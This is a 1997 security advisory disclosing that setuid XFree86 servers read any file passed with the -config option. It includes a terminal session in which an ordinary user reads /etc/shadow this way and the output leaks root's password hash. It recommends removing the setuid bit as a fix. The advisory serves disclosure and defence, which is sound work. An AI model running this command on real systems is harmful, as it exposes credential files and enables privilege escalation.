plaguez security advisory n.10 XFree86 insecurity Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...) Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2. Other versions as well. OS: All Impact: The XFree86 servers let you specify an alternate configuration file and do not check whether you have rights to read it. Any user can read files with root permissions. hello, just a short one to tell you about this "feature" I found in all default XFree86 servers... Here it is: Script started on Sat Aug 23 15:32:36 1997 Loading /usr/lib/kbd/keytables/fr-latin1.map [plaguez@plaguez plaguez]$ uname -a Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586 [plaguez@plaguez plaguez]$ ls -al /etc/shadow -rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow [plaguez@plaguez bin]$ id uid=502(plaguez) gid=500(users) groups=500(users) [plaguez@plaguez plaguez]$ cd /usr/X11R6/bin [plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1 use: X [:] [option] -a # mouse acceleration (pixels) -ac disable access control restrictions -audit int set audit trail level -auth file select authorization file bc enable bug compatibility -bs disable any backing store support -c turns off key-click ... and so on. HINT: look at the first XF86_SVGA output line. Patch: ------ If you run xdm, you should consider removing the setuid bit of the servers. If not, well, wait for the XFree86 Project to bring you a patch, since I'm too lazy to find and fix it. later, -plaguez dube0866@eurobretagne.fr